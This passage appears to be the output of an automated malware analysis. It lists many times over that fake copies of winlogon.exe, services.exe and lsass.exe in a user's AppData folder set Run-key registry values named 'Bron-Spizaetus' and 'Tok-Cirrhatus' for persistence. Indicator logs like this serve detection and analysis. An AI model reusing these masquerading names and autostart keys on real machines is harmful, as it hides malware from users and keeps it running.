                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\services.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\services.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\services.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\services.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\lsass.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\lsass.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\lsass.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\lsass.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
